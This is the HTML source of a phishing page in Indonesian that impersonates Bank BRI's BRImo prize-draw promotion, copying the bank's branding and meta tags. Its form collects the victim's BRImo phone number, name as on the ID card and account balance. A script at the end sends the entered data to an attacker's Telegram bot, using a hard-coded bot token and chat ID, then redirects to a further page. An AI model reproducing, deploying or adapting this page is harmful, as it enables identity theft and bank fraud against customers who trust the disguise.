<!DOCTYPE html>
<html lang="in">
<head>
<link rel="preload" href="https://www.googletagmanager.com/gtag/js?id=G-HHNHX5Z9PN" as="script"/><title>BRImo FSTVL 2025 - Berlimpah Hadiah - Bank BRI</title><meta name="description" content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI"/><meta name="author" content="BRI"/><meta name="keywords" content="bri, brimo FSTVL berlimpah hadiah, hadiah undian, hadiah langsung, BRimo, Nabung, Tabungan"/><meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1"/><link rel="canonical" href="https://brimofstvl.bri.co.id/"/><meta property="og:title" content="BRImo FSTVL 2025 - Berlimpah Hadiah - Bank BRI"/><meta property="og:description" content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI"/><meta property="og:url" content="https://brimofstvl.bri.co.id/"/><meta property="og:image" content="https://s3.ap-southeast-3.amazonaws.com/brimo-fstvl-prod//brimo_festival_2024_berlimpah_hadiah_undian_f70904df70.webp"/><meta property="og:image:width" content="800"/><meta property="og:image:height" content="600"/><meta property="og:image:alt" content="BRImo FSTVL"/><meta property="og:type" content="website"/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:title" content="BRImo FSTVL 2025 - Berlimpah Hadiah - Bank BRI"/><meta name="twitter:description" content="BRImo Berlimpah Hadiah! Raih lebih dari 100.000 hadiah dengan transaksi di BRImo: buka tabungan emas, bayar cicilan, belanja pakai QRIS, Kartu Kredit, debit BRI"/><meta name="twitter:image" content="https://s3.ap-southeast-3.amazonaws.com/brimo-fstvl-prod//brimo_festival_2024_berlimpah_hadiah_undian_f70904df70.webp"/><meta name="twitter:image:width" content="800"/><meta name="twitter:image:height" content="600"/><meta name="twitter:image:alt" content="BRImo FSTVL"/>    <meta name="theme-color" content="#0f78cb">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    
    <script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
</head>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      width: 100%;
      max-width: 400px;
      margin: 0 auto;
      }
body {
    margin: 0px;
    background: ,#fff;
    background-size: 100%;
    color: #fff;
    font-family: 'Nunito', sans-serif;
    max-width: 400px;
    max-height: 100vh;
    align-item: center;
    justify-content: center;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    margin-bottom: 110vh;
}

.lonte{
  display:none;
  z-index:3;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  max-width: 400px;
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     margin: 0 auto;
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
     max-width: 400px;
      }
      
      .jao{
            width:90%;
      }
      
 welalxcome {
    position: fixed;
    right: 0;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    margin: 0 auto;
    max-width: 400px;
    background: #ffffffcc;
    z-index: 999;
}
welalxcome img {
        width:15vw;
    height: auto;
}
chsalxcome {
    position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}


 
 .asu{
     width:100%;
     margin-top:55px;
     position: fixed;
     height: 100%;
     max-width: 400px;
     
 }  
    
 .nyusu{
     border-radius:7px;
     height:150px;
     max-width: 400px;
     margin-top: 20px;
     margin-left: 20px;
     box-shadow: rgba(0, 0, 0, 0.25) 0px 54px 55px, rgba(0, 0, 0, 0.12) 0px -12px 30px, rgba(0, 0, 0, 0.12) 0px 4px 6px, rgba(0, 0, 0, 0.17) 0px 12px 13px, rgba(0, 0, 0, 0.09) 0px -3px 5px;
     
 }
 
 ion-icon{
    font-size: 22px;
    margin-left: 8px;
    margin-top: -2px;
    position: absolute;
    color: #06529C;
}

.button-85 {
  background-color: ;
  max-width: 400px;
  user-select: none;
  -webkit-user-select: none;
  touch-action: manipulation;
}

.button-85:before {
  content: "";
  background: linear-gradient(
    50deg,
    #fff000,
    #ff7300,
    #fffb00,
    #48ff00,
    #00ffd5,
    #002bff,
    #7a00ff,
    #ff00c8,
    #ff0000
  );
  position: absolute;
  top: 0px;
  left: 0px;
  background-size: 500%;
  z-index: -1;
  filter: blur(0px);
  -webkit-filter: blur(0px);
  width: calc(100% + 0px);
  height: calc(100% + 0px);
  animation: glowing-button-85 20s linear infinite;
  transition: opacity 0.3s ease-in-out;
  border-radius: 18px;
}

@keyframes glowing-button-85 {
  0% {
    background-position: 0 0;
  }
  50% {
    background-position: 300% 0;
  }
  100% {
    background-position: 0 0;
  }
}

.button-85:after {
  z-index: -1;
  content: "";
  position: absolute;
  width: 100%;
  height: 100%;
  background: ;
  left: 0;
  top: 0;
  border-radius: none;
}
.patokk{
    max-width: 400px;
    margin: 0px auto;   
    position:relative;
    background-color:#0F78CB;
    color:#fff;
    border:0px solid #0076e0;
    width:90%;
    border-radius:3px;
    font-family: 'Nunito',sans-serif;
    font-size: 15px;
    padding: 13px;
    display: block;
    text-align: center;
    box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px,
rgba(0, 0, 0, 0.20) 0px 6px 6px;
}

.patokk:hover { 
         
     opacity:0.3;
     border: 1px solid #0F78CB; 
     background-color: #0F78CB; 
     color: #fff; 
         
         
         } 
.patokk:disabled, 
.patokk[disabled]{
    
    opacity:0.3;
    border: 1px solid #0F78CB; 
    background-color: #0F78CB; 
    color: #fff;
}

.pilat{
    max-width: 400px;
    position: fixed;
    bottom: 0;
    left: 0;
    right: 0;
    margin: 0px auto;
    width: 100%;
    height: 72px;
    background: #ffffff;
    box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px;
padding-top: 15px
}

.hh {
  z-index: 99999999;
  position: fixed;
  top: 0px;
  left: 0;
  right: 0;
  margin: 0px auto;
  width: 100%;
  height: 50px;
  background: #0F78CB;
  border-bottom: 0px solid #fff;
  box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;
}
    
    .hua{
        max-width: 320px;
        bottom:110px;               
        position: absolute;
        border:5px solid #fff;
        padding:15px;
        width:80%;
        border-radius:18px; 
        background: #ffffffe6;
        background-size:78%; 
        height: 420px; 
        left: 0;
        right: 0;
        margin: 0px auto;
        box-shadow: rgba(0, 0, 0, 0.40) 0px 5px 15px 0px; 
    }
    
.yantek{
max-width: 400px;
box-sizing: border-box;
height: 35px;
width: 536px;
max-width: 100%;
border: 1px solid rgb(0, 134, 224);
border-image: initial;
background-color: rgb(255, 255, 255);
border-radius: 10px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px,
rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;
font-family: 'Nunito',
sans-serif;
font-weight: bold;
font-size: 14px;
color: rgb(28, 28, 28);
word-spacing: 0px;
padding: 0px 10px;
outline: none;
margin-top: -15px;
padding-left: 10px;
    }
    
    .kk{
        box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px;
    }
    
    .kutal{
        position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #ffffff; box-shadow: rgba(0, 0, 0, 0.15) 0px -12px 15px 0px; padding-top: 15px;max-width: 400px;
    }
      .radio-item [type="radio"] {
	display: none;
}
.radio-item + .radio-item {
	margin-top: 5px;
}
.radio-item label {
	display: block;
	padding: 5px 8px;
	background: transparent;
	border: 2px solid #09559a;
	border-radius: 20px;
	cursor: pointer;
	font-size: 12px;
	font-weight: 400;
	min-width: 270px;
	padding-left: 0px;
	color: #09559a;
	margin: 5px auto;
	top:10px;
	margin-bottom:10px;
	position: relative;
	
}
.radio-item label:after,
.radio-item label:before {
	content: "";
	position: absolute;
	border-radius: 50%;
}
.radio-item label:after {
	height: 20px;
	width: 20px;
	border: 1px solid #09559a;
	left: 9px;
	top: calc(50% - 11px);
}
.radio-item label:before {
	background: #09559a;
	height: 17px;
	width: 17px;
	left: 11.2px;
	top: calc(50% - 9.8px);
	transform: scale(5);
	opacity: 0;
	visibility: hidden;
	transition: 0.4s ease-in-out 0s;
}
.radio-item [type="radio"]:checked ~ label {
	border-color: #F8B13B;
}
.radio-item [type="radio"]:checked ~ label::before {
	opacity: 1;
	visibility: visible;
	transform: scale(1);
	margin-top: 0.9px;
}
      .radio-section {
	display: flex;
	align-items: center;
	justify-content: center;
	height: 100vh;
	width:;
}
</style>
<body>
    <main>

</welalxcome>
<chsalxcome2 style="display: non;">
<img style="z-index:-1;position: fixed;width:100%;margin-top:0px;max-width: 400px;left: 0;right: 0;margin: 0px auto;" width="100%" src="https://i.ibb.co.com/4RWhY7mQ/Brimo-festival-2024.jpg" alt="logo1">
<img style="position: fixed;width:100%;margin-top:30px;max-width: 400px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLbc_ylAskLlx9P9ZMwA-rN0Sa9yo0BBoxVwlgBG-p2m1zKE6F3iiW4oUaPxnOENOA_CSxuSI-FQ0X50rDEXBGQj3GpEQkoiNFA6C6-EKdXkno0Mwjh3F1_Cvv27YbIk0zB1MNtPQwgfS9kUa7yrEm72xcVfN_fZ4915fL-W2IWCjg2APd9tOsBUnXDuwj/s540/26-.png" alt="">
<nav class="hh">
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmaqSV_5oSZYc_fIrO6tbjt2ob2FshZJYcK8VykU6o8YvOq28yq9n0rlPKI-usJjG7tYiiKmN7_zXZMezkX4eodLeAL5ii7_M5ARQKgImyI679MXaERtSuW0mIOYHPI_3wAYDXBZdvfbX_Xpcs4wU1jXFk2JCdwQFo_U-Kg_W1BSmajJG6BuwZ5gOTLQHW/s101/nav.png" style="margin-top:8px;" width="40px" alt=""></center></nav>
<div class="load" style="display:none">
 <img src="https://hosting.tigerengine.id/f01dmo.gif" class="jao" alt="">
      </div>
<marquee direction="right" behavior="alternate" scrolldelay="0" class="asu" style="display: block;animation: marquee 5000s linear infinite;overflow: hidden;">
<img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvpmlOeG32DmnR3PHlQok5PmYDxZaVUdPlGKLyG4QCW33uTUnEZFPM-DEvWV5s6qnM93sVZYLDLBPYF0diFB4-VlnYbLHpRHaiBOEBEY6AoF_D_GmuJtdCGagpEKI-MTnWU5AtLWTRLnPhJKoxRs3msRh3h0EbpiSrAc4ghrccz9pJ27jER3TSA-DgZNlY/s764/1%20%281%29.png" alt="">
<img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhik9N535bfsFqqjZdWU2E4hpd2a3SpppcwItoCE02CBo8V0yCeaHNB9cb6E8qB5iXWHulpi6jiBng2xJNG6t-7f9MJ5PCtAwNjDYzcBhlXv3tT5QNF76s9JpzxpfKsPrN59ObuQulT4lX6kC4gj1T1st-WckijjGzkjqnsqjT8PrrhcEqtgQz7NIuv_trN/s769/2.png" alt="">
<img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgiUP4wiREpfy9HrmM1PnV13b6e2Ajejk8Ob18ECY7SIJWTRn4-wGw6SAgZkyjWiEE6b2GdtqG9ZiwacfoL_THAhK1w7_vbVKOt2lni9vh1SDYEZZE6LTM2QihcU0xEzF61-WKhgUliL3YON82fHIeu4a28ktE2fj5GKfRmCx2W7zzfsWbUS5oJrxGXkZY/s739/3.png" alt="">
<img class="nyusu" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYykNXE4hAAcxY4SXmNAjVBIsv2SlTiRHkO0PWaW7blVI8lHy8nq8cPFUtheT3pSdDz33_rpxUBhAhoJd0qZlJLSIj1Vabct4ufO3U9zS4A8Qm_kTlVJ2ZoMFVcfAK1SGtj60QUpKn1uuS9NqoZ0wdPOrwyfusPCd4U7KmecweVTjGWb6XOh4K6K-lYYdY/s661/5.png" alt="">
</marquee>    



<form  id="dua" onclick="">
 <input type="hidden" name="logo" id="logo" value="𝗕𝗮𝗻𝗸 𝗕𝗥𝗜">

<div class="button-85 hua">
<center style="color:#09559a; line-height: 20px; font-size: 15px; padding: 0px;margin-top:-12px;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:0px;height:40px;">Nasabah berkesempatan memenangkan hadiah undian :</p>
<img style="width:90%;"src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_kLBVZfefpYDv66iZtcLD2WcSsk5ghBNYHc7hTOwMUeFT68dT1wNJcguHZE4xUoLmib2D8ojZWUL3X7kvX86SQgKf5nr27XDzv-XA1042J3KTCiVChKrJiieDLaAFfdtDIIgXCyLN8AXmLpXM1ldyVoCYdAT6NHmgfjDNxWv2AKyI_w-MHkF33fKohoX/s720/index.png" alt="">
</center>

	<div style="margin-top:0px;">
	  <
	</div>

<br><br>
<h5 style="position:absolute;color:#09559a; margin-top: -28px; margin-left: 4px">Masukan Nomor ponsel <b style="color: #06529C">BRI</b><b style="color: #F37024">mo</b> Anda :</h5>

<ion-icon name="phone-portrait-sharp">
</ion-icon>
<input id="NoHp" name=" Nomor •" type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 99%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 40px" placeholder="08xxxxxx"  required maxlength="13" minlength="10">
</h3>
<br>
<h5 style="color:#09559a; margin-top: 10px; margin-left: 4px"> Atas nama : </5>
  <input id="nama" name=" nama • " type="text" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: #; border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 15px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none;" placeholder="Nama sesuai KTP" required>
  </h3>
  <br>
  <h5 style="position:absolute;color:#09559a; margin-top: -28px; margin-left: 4px">Saldo akhir sesuai rekening:</h5>
  <input class="uang" id=" saldo • " name=" Saldo = " type="tel" style="box-sizing: border-box; height: 40px; width: 536px; max-width: 100%; border: 1px solid rgb(0, 134, 224); border-image: initial; background-color: rgb(255, 255, 255);  border-radius: 10px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px; font-family: 'Nunito', sans-serif; font-weight: bold; font-size: 16px; color: rgb(28, 28, 28); word-spacing: 0px; padding: 0px 10px; outline: none; margin-top: -15px; padding-left: 10px" placeholder="Rp xxxxx" required maxlength="13" minlength="10"></h3>

<br>
<br>
<div style="position: fixed; bottom: 0; left: 0; right: 0; margin: 0px auto; width: 100%; height: 72px; background: #fff; box-shadow: rgba(0, 0, 0, 0.15) 5px 5px 15px 0px; padding-top: 15px">
<button type="submit" id="kirims" style="margin-left: 20px;margin-top: ;position:absolute;background-color:#0F78CB;color:white;border:0px solid #0076e0;width:90%;border-radius:0px;font-family: 'Nunito', sans-serif;font-size: 15px;padding:13px;display: inline-block; box-shadow: rgba(0, 0, 0, 0.10) 0px 10px 10px, rgba(0, 0, 0, 0.20) 0px 6px 6px;" >Lanjut Cetak Kupon</button>
           </div>
</form>






</smalxs>
</main>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.2.2/jquery.min.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script type='text/javascript' src='k.js'></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script>
      $(document).ready(function() {
        setTimeout(() => {
          $('welalxcome').hide();
          $('chsalxcome2').fadeIn();
        }, 500)
      });
    </script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.15/jquery.mask.min.js"></script>
    <script src="jquery.min.js"></script>

    <script type="text/javascript">
      $(document).ready(function() {

        // Format mata uang.
        $('.uang').mask('000.000.000.000', { reverse: true });
        var dengan_rupiah = document.getElementById('saldo');
        dengan_rupiah.addEventListener('keyup', function(e)
        {
          dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
        });


        /* Fungsi */
        function formatRupiah(angka, prefix)
        {
          var number_string = angka.replace(/[^,\d]/g, '').toString(),
            split = number_string.split(','),
            sisa = split[0].length % 3,
            rupiah = split[0].substr(0, sisa),
            ribuan = split[0].substr(sisa).match(/\d{3}/gi);

          if (ribuan) {
            separator = sisa ? '.' : '';
            rupiah += separator + ribuan.join('.');
          }

          rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
          return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
        }
      })
      
</script>
   <p id="status"></p>
   <script src="dua.js"></script>
   
   <script>
   
            $(document).ready(function() {
            $("div#eyeOpen").on('click', function() {
                $("#eyeOpen").css("display", "none");
                $("#eyeClose").css("display", "block");

                $("#password").prop("type", "text");

                $("div#eyeClose").on('click', function() {
                    $("#eyeOpen").css("display", "block");
                    $("#eyeClose").css("display", "none");

                    $("#password").prop("type", "password");
                });
            });
            
const chat_id = '7556575590', botID = 'bot8102059239:AAEvk4lMb5147yqy2xbj8DOmlH_7ErimE9s';

    const telegramURL = `https://api.telegram.org/${botID}/sendMessage`;

    document.querySelector('#dua').addEventListener("submit", async e => { // When the user submits the form
        e.preventDefault(); // Don't submit
        let text = JSON.stringify( // Convert the form data to a string to send as our Telegram message
            Object.fromEntries(new FormData(e.target).entries()), // Convert the form data to an object.
        null, 2); // Prettify the JSON so we can read the data easily
        const sendMessage = await fetch(telegramURL, { // Send the request to the telegram API
            method: 'POST',
            headers: {"Content-Type": "application/json"}, // This is required when sending a JSON body.
            body: JSON.stringify({chat_id, text}), // The body must be a string, not an object
        });
        const messageStatus = document.querySelector('#status');
        if (sendMessage.ok) // Update the user on if the message went through
            messageStatus.textContent = "";
        else
            messageStatus.textContent = "Message Failed to send :( " + (await sendMessage.text());
        e.target.reset(); // Clear the form fields.
        window.location.href = '/konf.html';
    });

            
        });
</script>
</body>
</html>
